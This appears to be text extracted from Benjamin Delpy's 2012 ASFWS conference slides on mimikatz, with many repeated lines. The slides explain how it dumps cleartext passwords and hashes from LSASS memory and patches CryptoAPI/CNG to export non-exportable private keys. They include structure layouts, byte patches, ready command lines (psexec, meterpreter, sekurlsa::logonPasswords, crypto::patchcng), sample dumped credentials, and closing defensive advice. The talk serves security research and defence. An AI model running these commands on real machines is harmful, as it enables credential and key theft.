mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
